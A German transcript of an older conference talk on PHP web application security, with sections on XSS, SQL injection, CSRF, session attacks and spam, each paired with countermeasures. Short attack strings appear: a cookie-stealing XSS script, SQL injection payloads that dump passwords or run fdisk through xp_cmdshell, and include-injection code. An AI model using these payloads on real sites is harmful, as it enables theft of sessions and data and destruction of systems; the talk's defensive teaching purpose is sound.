Willkommen!
|
|
- Margarethe Linden
- vor 8 Jahren
- Abrufe
Transkript
1 Über mich Willkommen! Web Application Security mit/trotz PHP Christian Wenz PHP-Praxiserfahrung seit Anfang 1999 Koautor der PHP-5-Zertifizierung Gründungsmitglied im PHP Security Consortium Maintainer von ein paar PEAR-Paketen Berater, Autor, Trainer Blog: Agenda 1. Warum Web-Sicherheit? 2. Bekannte Angriffe 3. Nicht so bekannte Angriffe 4. Tipps & Tricks Agenda 1. Warum Web-Sicherheit? 2. Bekannte Angriffe 3. Nicht so bekannte Angriffe 4. Tipps & Tricks Web-Sicherheit Western European revenue for the security software market reached almost $2.5 billion in [IDC04] Viele Firmen geben also Unsummen aus, um Viren, Spyware, DDoS etc. zu bekämpfen.... aber... Das Problem Schlampige Programmierer sind viel effektiver Egal, welche serverseitige Technologie zum Einsatz kommt! Die "Outlaw group" passte eine Unterseite von Microsoft.com ein wenig an mit einer billigen Angriffsmethode ( Das passierte nicht etwa vor Jahrzehnten, sondern im Mai 2004 [ZoneH04] 1
2 Weitere Opfer T-Com: Schwächen en masse [Heise04a] SAT.1-Sicherheitsexperte Huth [Heise04b] Diverse Open-Source-Software, inkl. Gallery Weblog-Software Das hängt davon ab Ist PHP/ASP.NET/... unsicher? Meist: Unabhängig von der eingesetzten Technologie Das Problem ist also nicht PHP/ASP.NET/..., sondern der Schlamper vor der Tastatur klassisch PEBKAC Bekannte Schwächen OWASP The Open Web Application Security Project 2007 Top Ten List [OWASP07]: 1. [Schlampiger Programmierer] 2. [Schlampiger Programmierer] Mangelnde Verschlüsselung 10. Unsichere Konfiguration Unser Ziel Was ist zu tun? Simpel: Beim Programmierern nicht schlampen! Nun ja, eine dumme Antwort auf eine dumme Frage Besserer Ansatz: Lernen, wie der Feind vorgeht. Aufbau des Vortrags Zuerst: Schlampiger (ich wiederhole mich) Code. Dann: Ausnutzen der unsauberen Programmierung. Abschließend: Gegenmaßnahmen Keine Website ist 100%ig sicher, aber den Feind zu kennen ist der erste Schritt dahin Agenda 1. Warum Web-Sicherheit? 2. Bekannte Angriffe 3. Nicht so bekannte Angriffe 4. Tipps & Tricks 2
3 Nicht geprüfte Nutzerdaten Nicht geprüfte Nutzerdaten (2) Problem: Benutzereingaben werden vor der Verarbeitung nicht überprüft Szenario: Gästebuch. Nutzer geben Text ein, der wird unverändert ausgegeben HTML-Markup Sehr lange Wörter Mögliche lustige Angriffe <img src=" /> <hr /> <div style="display:none"> <table> <a href=" Nicht geprüfte Nutzerdaten (3) Nicht geprüfte Nutzerdaten (4) Abwehr: All Input Is Evil. [Howard] Alle Nutzereingaben prüfen Immer wenn die Grenze zwischen Vertrautem (Webserver) und Bösem (Internet) überschritten wird, ist Vorsicht empfohlen Vor dem Zurücksenden z.b. htmlspecialchars() verwenden <?php require $_GET["page"]. ".inc";?> Da kann u.u. alles inkludiert werden... Hacken per URL Problem: Unsere URLs sind nicht selbsterklärend, ich kann mir also Berechtigungsüberprüfung sparen Szenario: Newsboard mit Berechtigungssystem. Ein Benutzer erhält nur die Editier-Links angezeigt, die ihn betreffen URLs manuell aufbauen Hacken per URL (2) Abwehr: Parameter vermeiden Ist auch für Google & Co. Besser! Möglichst viele Daten in einer Session ablegen Immer vom Worst Case ausgehen: Die Daten sind manipuliert Berechtigungs-Check Sanity Checks 3
4 XSS (Cross Site Scripting) XSS (Cross Site Scripting) (2) Problem: (Bösartiger) Skriptcode wird in die Ausgabe eines (serverseitigen) Skripts eingebettet. Läuft dann innerhalb der Seite. Szenario: Wieder das Gästebuch Alles was JavaScript hergibt... und auch ein wenig HTML Mögliche lustige Angriffe <script>alert("hallo");</script> ><script>alert("hallo");</script><a name=" <script>(new Image()).src = " + escape(document.cookie); <meta http-equiv="set-cookie" content="sid=123" /> Ajax (mit Einschränkungen) XSS (Cross Site Scripting) (3) XSS (Cross Site Scripting) (4) Abwehr: Wie zuvor: prüfen, prüfen, prüfen Daten überprüfen Ausgabe: echo()/print()/*printf() Header: header() Dateien schreiben: fwrite() htmlspecialchars() Weitere Tests bei z.b. -Adressen,... Warum gibt es überhaupt noch XSS? Abwägung User Experience vs. Sicherheit Nicht alle HTML-Daten sollen ausgefiltert werden Doch die meisten Ansätze haben Fehler <script... herausfiltern javascript: herausfiltern Bessere Vorschläge? CSRF (Cross-Site Request Forgery) CSRF in Aktion Angriff innerhalb des Webbrowsers des Opfers In der Regel wird per JavaScript eine ungewollte HTTP-Anforderung erzeugt Beispiel MySpace.com-Wurm: Fast eine Million Opfer Nur POST zulassen ist kein zuverlässiger Schutz Opfer (Client) 3) Ruft Seite auf 2) Schickt JavaScript 1) Ruft Seite auf andere Website Angreifer (Website) 4
5 SQL Injection Problem: Benutzereingaben werden in SQL- Kommandos eingefügt. Szenario: CMS (Content Management System). ID eines Eintrags wird in URL übergeben: $sql = "SELECT * FROM news WHERE id=". $_GET["id"]; $sql = sprintf("select * FROM users WHERE user='%s' AND pass='%s'", $_POST['u'], $_POST['p']); Einschleusen von ungewolltem SQL SQL Injection (2) Mögliche lustige Angriffe xyz' OR 1=1 /* xyz' UNION SELECT name, pwd FROM users /* xyz'; EXEC master..xp_cmdshell('fdisk...'); -- SQL Injection (3) SQL Injection (4) Abwehr: Wieder einmal: Alle Eingaben prüfen Böse Sonderzeichen filtern (', [, ], %, _, ) Parametrisierte Abfragen (kann nicht jede Datenbankerweiterung) Stored Procedures SPs verringern nicht die Anzahl möglicher Fehler, sondern die Anzahl der potenziellen Schlamper DB Escape-Funktion Prepared St. MySQL mysql(i)_real_escape_string() MSSQL addslashes() * SQLite sqlite_escape_string() PostgreSQL pg_escape_string() Oracle --- * mit ini_set('magic_quotes_sybase', 1) Agenda 1. Warum Web-Sicherheit? 2. Bekannte Angriffe 3. Nicht so bekannte Angriffe 4. Tipps & Tricks Session Fixation Problem: Eine Session wird erzeugt und dann einem Nutzer untergeschoben Szenario: Websites, bei denen sensible Daten über Sessions geschützt sind, z.b. Webmail xyz.php?phpsessid=abc0815 5
6 Session Fixation (2) Abwehr: Bei neu initialisierten Sessions immer session_regenerate_id() aufrufen Erzeugt eine neue, echte Session-ID Gleiches beim Übertreten von ungeschütztem in geschützten Bereich Session Hijacking Problem: Die Session eines Opfers wird als Geisel genommen Szenario: Wie zuvor, z.b. Webmail schick mir doch mal den Link selbst Link schicken, dann HTTP_REFERER auswerten raten (meist nur in Verbindung mit Session Fixation erfolgsversprechend Session Hijacking (2) Abwehr: Viele Ansätze, keiner ist optimal Session an IP binden Daten aus HTTP-Header zur Authentifizierung verwenden Session zeitbegrenzen Vor kritischen/sensiblen Operationen erneuten Login erfordern Gefälschte Cookies Problem: Cookies sind sicherer als Sessions, denn Letztere können gefälscht werden stimmt nicht. Cookies werden als Teil des HTTP-Headers mitgeschickt, sind also simpel zu fälschen Szenario: Website authentifiziert Nutzer, speichert das dann in einem Cookie Angriff: Cookie fälschen (falls statischer Wert) Gefälschte Cookies (2) XPath Injection Abwehr: Daten in Cookies verschlüsseln Nie unverschlüsselte, simple Daten in Cookies schicken ( eingeloggt=true schlechte Idee) Dynamische Daten in Cookies verwenden (z.b. Session ID), nie statischer Code/Wert für dynamische Daten Problem: Nutzerdaten werden ungeprüft in XPath-Ausdrücke übernommen. Szenario: Web Services; Nutzerverwaltung auf XML-Basis Leider kein eingebautes Gegenmittel Deswegen: Prüfen (Whitelist)! :) 6
7 RegEx-Injection Problem: Codeausführung mit regulären Ausdrücken Szenario: Zum Glück (noch) wenige Die RegEx-Option e, sofern verfügbar (u.a. preg_* in PHP), möglichst vermeiden. Mail-Skripte Problem: Mail-Skripte werden zum Versenden unerwünschter Mails missbraucht Szenario: Feedback-Formular, Weblogs Empfängeradresse in verstecktem Formularfeld macht einen Missbrauch einfach DoS durch wiederholten Aufruf des Skripts Lösung: Kommentare prüfen IP-Adressen blockieren Kommentare moderieren Ältere Einträge für Kommentare schließen URL des Kommentar-Skripts ändern HTTP_REFERER prüfen Ein weiterer Weg... Abwehr: Nur Menschen dürfen das Formular versenden Nie vom Client Empfänger-Adressen zulassen (oder: Whitelist) CAPTCHAs (Turing-Tests) gegen automatischen Formular-Versand [vonahn03] Barrierefreiheit mit alternativen Mitteln, beispielsweise Audio-CAPTCHAs CAPTCHAs Completely Automated Turing Test to Tell Computers and Humans Apart Turing-Test: Ist am anderen Ende der Leitung ein Mensch oder eine Maschine Wird von immer mehr Websites eingesetzt (u.a. Yahoo!) 7
8 Grafische CAPTCHAs Text_CAPTCHA Wichtigste Grundregel: Source-Code steht offen Meist: Grafiken mit Text drauf Und wie? Selber bauen (GD2,...) Vorgefertigte Lösungen verwenden, z.b. Text_CAPTCHA Paket-Homepage: Achtung, API wird sich zukünftig möglicherweise ändern Diverse alternative CAPTCHAs in Betrieb, mit unterschiedlichem Erfolg Text_CAPTCHA (2) Text_CAPTCHA (3) require_once 'Text/CAPTCHA.php'; $c = Text_CAPTCHA::factory('Image'); $retval = $c->init(200, 80, null, $options); $_SESSION["phrase"] = $c->getphrase(); $png = $c->getcaptchaaspng(); file_put_contents(session_id(). ".png", $png); echo '<form method="post">'. '<img src="'. session_id(). '.png?'. time(). '" />'. '<input type="text" name="phrase" />'. '<input type="submit" /></form>'; if (isset($_post['phrase']) && isset($_session['phrase']) && strlen($_post['phrase']) > 0 && strlen($_session['phrase']) > 0 && $_POST['phrase'] == $_SESSION['phrase']) { $msg = 'OK!'; $ok = true; unset($_session["phrase"]); } else { $msg = 'Please try again!'; } unlink(session_id(). '.png'); Screen Scraping Problem: Website wird mit wget geladen, geparst, Daten verarbeitet [HauWe01] Szenario: Aktuelle Liste der billigsten Tankstellen Angriff: wget + reguläre Ausdrücke Screen Scraping (2) Abwehr: Auf Mensch prüfen Wieder einmal CAPTCHAs Dann braucht der Angreifer notgeile Nutzer (das funktioniert aber sehr effektiv) 8
9 CAPTCHAs knacken Was ist schlimmer als schlampige Programmierer? Personen mit unkontrollierter Libido Trackback-Spamming Problem: Spammer erzeugen Trackbacks auf Weblogs um einen Link auf deren URL zu erhalten. Ergebnis: Besserer PageRank Die Trackback-API ist sehr einfach» POST Content-type: application/x-www-form-urlencoded title=buy+stuff&url= y+my+stuff&blog_name=spamblog Trackback-Spamming (3) IPs blocken Dynamische Blacklist für URLs/IPs Liste mit bösen Wörtern Autodiscovery deaktivieren Trackbacks bei älteren Einträgen deaktivieren Fazit Das Problem ist (fast) immer dasselbe: Bösartige Daten werden ungeprüft (oder fehlerhaft geprüft) weiter verarbeitet Die Ausprägungen (wo kommen die Daten her, wie werden sie verarbeitet) sind aber stets unterschiedlich Besser paranoid als offline Google ist dein Feind Keine phpinfo()-seiten auf Live-Server! Keine Fehlermeldungen an den Nutzer! display_errors = Off log_errors = On robots.txt ist nicht geheim Und natürlich: The Spider of Doom 9
10 PHP und Security Daten prüfen, prüfen, prüfen Kein register_globals=on! Unbedingt error_reporting = E_ALL! Agenda 1. Warum Web-Sicherheit? 2. Bekannte Angriffe 3. Nicht so bekannte Angriffe 4. Tipps & Tricks Einige Tipps Quellen Trust no-one vor allem keinen Nutzereingaben Prüfen vor dem Verarbeiten dynamischer Daten Ausgeben dynamischer Daten Nicht das Problem unterschätzen [IDC04] IDC-Press Release ( 04_22_210409) [HauWe01] Hauser, Wenz in c t (17/2001), S [Heise04a] [Heise04b] [Howard03] Howard, LeBlanc, Writing Secure Code, 2. Auflage, MS Press 2003 Quellen (2) [OWASP07] OWASP. The Open Web Application Security Project. [vonahn03] von Ahn, Blum, Hopper and Langford. CAPTCHA: Using Hard AI Problems for Security. Eurocrypt [ZoneH04] MS Defacement ( Vielen Dank! Herzlichen Dank für die Aufmerksamkeit! Noch Fragen? christian.wenz@arrabiata.de php5protraining@lists.dynamicwebpages.de 10
Sicherheit in Webanwendungen CrossSite, Session und SQL
Sicherheit in Webanwendungen CrossSite, Session und SQL Angriffstechniken und Abwehrmaßnahmen Mario Klump Die Cross-Site -Familie Die Cross-Site-Arten Cross-Site-Scripting (CSS/XSS) Cross-Site-Request-Forgery
MehrPHP-5-Zertifizierung. Block 12 Security.
PHP-5-Zertifizierung Block 12 Security Allgemeine Regeln Alle Eingaben (von außen) sind (potenziell) böse Eingaben filtern/validieren Ausgaben escapen Trauen Sie nichts von außen! GET-/POST-Daten Cookies
MehrSession Management und Cookies
LMU - LFE Medieninformatik Blockvorlesung Web-Technologien Wintersemester 2005/2006 Session Management und Cookies Max Tafelmayer 1 Motivation HTTP ist ein zustandsloses Protokoll Je Seitenaufruf muss
MehrAktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen
FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte
MehrEnigmail Konfiguration
Enigmail Konfiguration 11.06.2006 Steffen.Teubner@Arcor.de Enigmail ist in der Grundkonfiguration so eingestellt, dass alles funktioniert ohne weitere Einstellungen vornehmen zu müssen. Für alle, die es
MehrBBCode v2.0. Einleitung...2 Installation... 3 Bugfixliste... 5. Inhaltsverzeichnis. Überarbeiteter BBCode + neuem Interface.
BBCode v2.0 Überarbeiteter BBCode + neuem Interface Inhaltsverzeichnis Einleitung...2 Installation... 3 Bugfixliste... 5 Seite 1 von 5 Einleitung Geschichte/Entstehung der BBCode Klasse Wie entstand das
MehrHacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink
Hacker-Methoden in der IT- Sicherheitsausbildung Dr. Martin Mink Hacker-Angriffe 3.11.2010 Hacker-Methoden in der IT-Sicherheitsausbildung Dr. Martin Mink 2 Typische Angriffe auf Web- Anwendungen SQL Injection
MehrWeb 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte
Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In)Security - Themen Alte Freunde SQL Injections, Code Executions & Co. Cross Site Scripting Cross Site Scripting in der Praxis JavaScript
MehrPHP - Projekt Personalverwaltung. Erstellt von James Schüpbach
- Projekt Personalverwaltung Erstellt von Inhaltsverzeichnis 1Planung...3 1.1Datenbankstruktur...3 1.2Klassenkonzept...4 2Realisierung...5 2.1Verwendete Techniken...5 2.2Vorgehensweise...5 2.3Probleme...6
Mehrmysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank
mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank In den ersten beiden Abschnitten (rbanken1.pdf und rbanken2.pdf) haben wir uns mit am Ende mysql beschäftigt und kennengelernt, wie man
MehrAktuelle Bedrohungen im Internet
Aktuelle Bedrohungen im Internet Max Klaus, MELANI Bedrohungen von Webanwendungen Reto Inversini, BIT Botnetze webreaders.de/wp-content/uploads/2008/01/botnetz.jpg ISB / NDB Melde- und Analysestelle Informationssicherung
MehrDokumentation. Black- und Whitelists. Absenderadressen auf eine Blacklist oder eine Whitelist setzen. Zugriff per Webbrowser
Dokumentation Black- und Whitelists Absenderadressen auf eine Blacklist oder eine Whitelist setzen. Zugriff per Webbrowser Inhalt INHALT 1 Kategorie Black- und Whitelists... 2 1.1 Was sind Black- und Whitelists?...
MehrWeb Application Security
Web Application Security Was kann schon schiefgehen. Cloud & Speicher Kommunikation CMS Wissen Shops Soziale Netze Medien Webseiten Verwaltung Chancen E-Commerce Kommunikation Globalisierung & Digitalisierung
Mehrhttp://bitschmiede.com post@bitschmiede.com Drucken von Webseiten Eine Anleitung, Version 1.0
http://bitschmiede.com post@bitschmiede.com Drucken von Webseiten Eine Anleitung, Version 1.0 Drucken von Webseiten Autor: Christian Heisch Technischer Verantwortlicher für die Webseitenumsetzung bei
MehrTimeMachine. Time CGI. Version 1.5. Stand 04.12.2013. Dokument: time.odt. Berger EDV Service Tulbeckstr. 33 80339 München
Time CGI Version 1.5 Stand 04.12.2013 TimeMachine Dokument: time.odt Berger EDV Service Tulbeckstr. 33 80339 München Fon +49 89 13945642 Mail rb@bergertime.de Versionsangaben Autor Version Datum Kommentar
MehrWordpress: Blogbeiträge richtig löschen, archivieren und weiterleiten
Wordpress: Blogbeiträge richtig löschen, archivieren und weiterleiten Version 1.0 Wordpress: Blogbeiträge richtig löschen, archivieren und weiterleiten In unserer Anleitung zeigen wir Dir, wie Du Blogbeiträge
MehrPHP und MySQL. Sicherheit und Session-Handling mit PHP. Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424
Zentrum für Informationsdienste und Hochleistungsrechnen PHP und MySQL Sicherheit und Session-Handling mit PHP Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424 (michael.kluge@tu-dresden.de)
MehrWarum Sie jetzt kein Onlinemarketing brauchen! Ab wann ist Onlinemarketing. So finden Sie heraus, wann Ihre Website bereit ist optimiert zu werden
CoachingBrief 02/2016 Warum Sie jetzt kein Onlinemarketing brauchen! Eine Frage gleich zu Anfang: Wie viele Mails haben Sie in dieser Woche erhalten, in denen behauptet wurde: Inhalt Ihre Webseite sei
MehrEinführung in die Scriptsprache PHP
Herbst 2014 Einführung in die Scriptsprache PHP Wirtschaftsinformatik: 5. Semester Dozenten: Rainer Telesko / Martin Hüsler Fachhochschule Nordwestschweiz FHNW - Rainer Telesko / Martin Hüsler 1 Inhalt:
MehrOWASP Top 10. im Kontext von Magento. Mittwoch, 21. November 12
OWASP Top 10 im Kontext von Magento 1 Ich Fabian Blechschmidt (@Fabian_ikono) blechschmidt@fabianblechschmidt.de PHP seit 2004 Freelancer seit 2008 Magento seit 2011 Certified Magento Developer spielt
MehrAlice E-Mail & More Anleitung. GigaMail.
Alice E-Mail & More Anleitung. GigaMail. E-Mail & More GigaMail. Riesige Mails sicher verschicken. Mit den Möglichkeiten steigen die Ansprüche. Da Sie nun das rasante Alice DSL zu Hause haben, erleben
MehrOP-LOG www.op-log.de
Verwendung von Microsoft SQL Server, Seite 1/18 OP-LOG www.op-log.de Anleitung: Verwendung von Microsoft SQL Server 2005 Stand Mai 2010 1 Ich-lese-keine-Anleitungen 'Verwendung von Microsoft SQL Server
MehrTitel. App-V 5 Single Server Anleitung zur Installation
Autor: Thomas Hanrath Microsoft Certified Trainer Titel App-V 5 Single Server Anleitung zur Installation Eine beispielhafte Installationsanleitung zur Verwendung im Testlab Quelle: System Center Blog von
Mehr> Internet Explorer 7
> Internet Explorer 7 Browsereinstellungen optimieren Übersicht Inhalt Seite 1. Cache und Cookies löschen 2. Sicherheits- und Datenschutzeinstellungen 2 5 Stand Juli 2009 1. Cache und Cookies löschen Jede
MehrAnleitung über den Umgang mit Schildern
Anleitung über den Umgang mit Schildern -Vorwort -Wo bekommt man Schilder? -Wo und wie speichert man die Schilder? -Wie füge ich die Schilder in meinen Track ein? -Welche Bauteile kann man noch für Schilder
MehrA. Ersetzung einer veralteten Govello-ID ( Absenderadresse )
Die Versendung von Eintragungsnachrichten und sonstigen Nachrichten des Gerichts über EGVP an den Notar ist nicht möglich. Was kann der Notar tun, um den Empfang in seinem Postfach zu ermöglichen? In zahlreichen
MehrBrowsereinstellungen für moneycheck24 in Explorer unter Windows
Browsereinstellungen für moneycheck24 in Explorer unter Windows Wichtige Einstellungen im + Um zu prüfen, welche Version Sie nutzen Einstellungen: Klicken Sie im Menü INTERNETOPTIONEN Extras [oder Tastenkürzel
MehrSEMINAR Modifikation für die Nutzung des Community Builders
20.04.2010 SEMINAR Modifikation für die Nutzung des Community Builders Step by Step Anleitung ecktion SEMINAR Modifikation für die Nutzung des Community Builders Step by Step Anleitung Bevor Sie loslegen
MehrAbwesenheitsnotiz im Exchange Server 2010
Abwesenheitsnotiz im Exchange Server 2010 1.) Richten Sie die Abwesenheitsnotiz in Outlook 2010 ein und definieren Sie, an welche Absender diese gesendet werden soll. Klicken Sie dazu auf Datei -> Informationen
MehrProfessionelle Seminare im Bereich MS-Office
Serienbrief aus Outlook heraus Schritt 1 Zuerst sollten Sie die Kontakte einblenden, damit Ihnen der Seriendruck zur Verfügung steht. Schritt 2 Danach wählen Sie bitte Gerhard Grünholz 1 Schritt 3 Es öffnet
MehrGezielt über Folien hinweg springen
Gezielt über Folien hinweg springen Nehmen wir an, Sie haben eine relativ große Präsentation. Manchmal möchten Sie über Folien hinweg zu anderen Folien springen. Das kann vorkommen, weil Sie den gesamten
MehrErster Schritt: Antrag um Passwort (s. www.ifb.co.at Rubrik -> techn. Richtlinien/Antrag für Zugangsberechtigung)
Benutzeranleitung Sehr geehrte Mitglieder und Experten! Diese Benutzeranleitung erklärt die Handhabung und Navigation zu den spezifischen Arbeitsgruppen unter der Rubrik Technische Richtlinien auf der
MehrAnleitung zum Öffnen meiner Fotoalben bei web.de
Anleitung zum Öffnen meiner Fotoalben bei web.de Ich begrüße Sie auf das Herzlichste. Das sind die Adressen meiner Fotoalben: https://fotoalbum.web.de/gast/erwin-meckelbrug/anna https://fotoalbum.web.de/gast/erwin-meckelburg/tra_my
Mehr1. EINLEITUNG 2. GLOBALE GRUPPEN. 2.1. Globale Gruppen anlegen
GLOBALE GRUPPEN 1. EINLEITUNG Globale Gruppen sind system- oder kategorieweite Gruppen von Nutzern in einem Moodlesystem. Wenn jede Klasse einer Schule in eine globale Gruppe aufgenommen wird, dann kann
MehrAlbert HAYR Linux, IT and Open Source Expert and Solution Architect. Open Source professionell einsetzen
Open Source professionell einsetzen 1 Mein Background Ich bin überzeugt von Open Source. Ich verwende fast nur Open Source privat und beruflich. Ich arbeite seit mehr als 10 Jahren mit Linux und Open Source.
MehrDas Blabla des LiLi-Webteams. Browser. HTML-Dateien. Links & Webadressen. ROXEN.
A Das Blabla des LiLi-Webteams Browser. HTML-Dateien. Links & Webadressen. ROXEN. Ansicht a1: Browser Das English Wort Browser wird gern direkt übersetzt mit dem deutschen Stöberer. Verstehen sollte man
MehrBedienungsanleitung: Onlineverifizierung von qualifiziert signierten PDF-Dateien
Sie haben von der VR DISKONTBANK GmbH ein signiertes PDF-Dokument (i.d.r. eine Zentralregulierungsliste mit dem Status einer offiziellen Rechnung) erhalten und möchten nun die Signatur verifizieren, um
MehrWie funktioniert das WWW? Sicher im WWW
Wie funktioniert das WWW? Sicher im WWW Der normale Aufruf 1. Browserprogramm starten 2. Adresse eintippen, z.b. : ich-hab-doch-nichts-zu-verbergen.de 3. Der Browser ändert die Adresse auf: http://ich-hab-doch-nichts-zu-verbergen.de/
Mehr1 Einleitung. Lernziele. automatische Antworten bei Abwesenheit senden. Einstellungen für automatische Antworten Lerndauer. 4 Minuten.
1 Einleitung Lernziele automatische Antworten bei Abwesenheit senden Einstellungen für automatische Antworten Lerndauer 4 Minuten Seite 1 von 18 2 Antworten bei Abwesenheit senden» Outlook kann während
MehrNach der Installation des FolderShare-Satellits wird Ihr persönliches FolderShare -Konto erstellt.
FolderShare Installation & Konfiguration Installation Eine kostenlose Version von FolderShare kann unter http://www.foldershare.com/download/ heruntergeladen werden. Sollte die Installation nicht automatisch
Mehr1. Einführung 2. 2. Erstellung einer Teillieferung 2. 3. Erstellung einer Teilrechnung 6
Inhalt 1. Einführung 2 2. Erstellung einer Teillieferung 2 3. Erstellung einer Teilrechnung 6 4. Erstellung einer Sammellieferung/ Mehrere Aufträge zu einem Lieferschein zusammenfassen 11 5. Besonderheiten
MehrAlltag mit dem Android Smartphone
2 Alltag mit dem Android Smartphone 5. Viele Nutzer von Google-Konten nutzen diese zwar für Mail und Kalender, aber noch nicht für Google+. Bei der Einrichtung auf dem Smartphone erscheint jetzt eine Frage,
MehrErstellen einer Collage. Zuerst ein leeres Dokument erzeugen, auf dem alle anderen Bilder zusammengefügt werden sollen (über [Datei] > [Neu])
3.7 Erstellen einer Collage Zuerst ein leeres Dokument erzeugen, auf dem alle anderen Bilder zusammengefügt werden sollen (über [Datei] > [Neu]) Dann Größe des Dokuments festlegen beispielsweise A4 (weitere
MehrUm die Rücklagen ordnungsgemäß zu verbuchen, ist es wichtig, Schritt-für-Schritt vorzugehen:
Software WISO Hausverwalter 2014 Thema Eingabe von Rücklagenbuchungen Version / Datum V 1.2 / 28.05.2013 Um die Rücklagen ordnungsgemäß zu verbuchen, ist es wichtig, Schritt-für-Schritt vorzugehen: Schritt
MehrHardware - Software - Net zwerke
Komprimierung der Ortho-Daten als ZIP-Archiv Dieses Dokument beschreibt die Archivierung aller Ortho-Daten als ZIP-Archiv über die MS- DOS-Eingabe-Aufforderung. Diese Information kann Ihnen zum Sichern
MehrWebseiten mit fragwürdigen Aufrufen von "spy & track" - Unternehmen
Webseiten mit fragwürdigen Aufrufen von "spy & track" - Unternehmen Die vorliegende Dokumentation umfasst eine kleine Auswahl von Webseiten, bei denen automatisch (ohne Benutzer vorab zu informieren oder
MehrProtect 7 Anti-Malware Service. Dokumentation
Dokumentation Protect 7 Anti-Malware Service 1 Der Anti-Malware Service Der Protect 7 Anti-Malware Service ist eine teilautomatisierte Dienstleistung zum Schutz von Webseiten und Webapplikationen. Der
MehrUnd der Schluß vom Beschluß: Beschlossen und verkündet hört sich an wie aus einer Gerichtsserie. Was soll das alles?
Von: " Schirmer" Datum: 28. September 2006 18:16:46 MESZ Cc: "Helmut Hehn" , "Wolfgang Engelskirchen" , "Peter Blumenroether" ,
MehrMediator 9 - Lernprogramm
Mediator 9 - Lernprogramm Ein Lernprogramm mit Mediator erstellen Mediator 9 bietet viele Möglichkeiten, CBT-Module (Computer Based Training = Computerunterstütztes Lernen) zu erstellen, z. B. Drag & Drop
MehrZwischenablage (Bilder, Texte,...)
Zwischenablage was ist das? Informationen über. die Bedeutung der Windows-Zwischenablage Kopieren und Einfügen mit der Zwischenablage Vermeiden von Fehlern beim Arbeiten mit der Zwischenablage Bei diesen
MehrNotizen. 1 Inhaltsverzeichnis 1 INHALTSVERZEICHNIS... 1 2 EINLEITUNG... 2 3 KONFIGURATIONSEINSTELLUNGEN... 3 4 VERTRAUENSWÜRDIGE SITES HINZUFÜGEN...
Seite1 1 Inhaltsverzeichnis 1 INHALTSVERZEICHNIS... 1 2 EINLEITUNG... 2 3 KONFIGURATIONSEINSTELLUNGEN... 3 3.1 KONFIGURATIOSNEINSTELLUNGEN FÜR INTERNET EXPLORER... 3 3.2 ANZAHL AN GLEICHZEITIGEN DOWNLOADS
MehrM@school Software- und Druckerzuweisung Selbstlernmaterialien
Bildung und Sport M@school Software- und Druckerzuweisung Selbstlernmaterialien Hinweise zum Skript: LMK = Linker Mausklick RMK = Rechter Mausklick LMT = Linke Maustaste RMT = Rechte Maustaste Um die Lesbarkeit
MehrDas sogenannte Beamen ist auch in EEP möglich ohne das Zusatzprogramm Beamer. Zwar etwas umständlicher aber es funktioniert
Beamen in EEP Das sogenannte Beamen ist auch in EEP möglich ohne das Zusatzprogramm Beamer. Zwar etwas umständlicher aber es funktioniert Zuerst musst du dir 2 Programme besorgen und zwar: Albert, das
MehrMultivariate Tests mit Google Analytics
Table of Contents 1. Einleitung 2. Ziele festlegen 3. Einrichtung eines Multivariate Tests in Google Analytics 4. Das JavaScript 5. Die Auswertung der Ergebnisse Multivariate Tests mit Google Analytics
MehrSie können diesen Service verwenden, um fast beliebig große Dateien auch über 2 GB zu versenden.
1 Informationen zum F*EX Service von BelWü Sie können diesen Service verwenden, um fast beliebig große Dateien auch über 2 GB zu versenden. 2 Registrierung für den Service Auf fex.belwue.de finden Sie
MehrPassword Depot für ios
Password Depot für ios Inhaltsverzeichnis Erste Schritte... 1 Kennwörterdatei erstellen... 1 Neue Einträge erstellen... 3 Einträge / Gruppen hinzufügen... 3 Einträge / Gruppen kopieren oder verschieben...
MehrTevalo Handbuch v 1.1 vom 10.11.2011
Tevalo Handbuch v 1.1 vom 10.11.2011 Inhalt Registrierung... 3 Kennwort vergessen... 3 Startseite nach dem Login... 4 Umfrage erstellen... 4 Fragebogen Vorschau... 7 Umfrage fertigstellen... 7 Öffentliche
MehrAGROPLUS Buchhaltung. Daten-Server und Sicherheitskopie. Version vom 21.10.2013b
AGROPLUS Buchhaltung Daten-Server und Sicherheitskopie Version vom 21.10.2013b 3a) Der Daten-Server Modus und der Tresor Der Daten-Server ist eine Betriebsart welche dem Nutzer eine grosse Flexibilität
MehrStellvertretenden Genehmiger verwalten. Tipps & Tricks
Tipps & Tricks INHALT SEITE 1. Grundlegende Informationen 3 2.1 Aktivieren eines Stellvertretenden Genehmigers 4 2.2 Deaktivieren eines Stellvertretenden Genehmigers 11 2 1. Grundlegende Informationen
MehrInstallation von Druckern auf dem ZOVAS-Notebook. 1. Der Drucker ist direkt mit dem Notebook verbunden
Installation von Druckern auf dem ZOVAS-Notebook Bei der Installation eines Druckers muss grundsätzlich unterschieden werden, ob der Drucker direkt am Notebook angeschlossen ist oder ob ein Drucker verwendet
MehrJederzeit Ordnung halten
Kapitel Jederzeit Ordnung halten 6 auf Ihrem Mac In diesem Buch war bereits einige Male vom Finder die Rede. Dieses Kapitel wird sich nun ausführlich diesem so wichtigen Programm widmen. Sie werden das
MehrTutorial. In diesem Tutorial möchte ich die Möglichkeiten einer mehrspracheigen Web-Site erläutern.
Tutorial In diesem Tutorial möchte ich die Möglichkeiten einer mehrspracheigen Web-Site erläutern. Zu Beginn müssen wir uns über die gewünschten Sprachen Gedanken machen. Zum einem, da eine professionelle
MehrOutlook Web App 2013 designed by HP Engineering - powered by Swisscom
Outlook Web App 2013 designed by HP Engineering - powered by Swisscom Dezember 2014 Inhalt 1. Einstieg Outlook Web App... 3 2. Mails, Kalender, Kontakten und Aufgaben... 5 3. Ihre persönlichen Daten...
MehrKulturelle Evolution 12
3.3 Kulturelle Evolution Kulturelle Evolution Kulturelle Evolution 12 Seit die Menschen Erfindungen machen wie z.b. das Rad oder den Pflug, haben sie sich im Körperbau kaum mehr verändert. Dafür war einfach
MehrSind Sie reif fürs ASSESSEMENT CENTER?
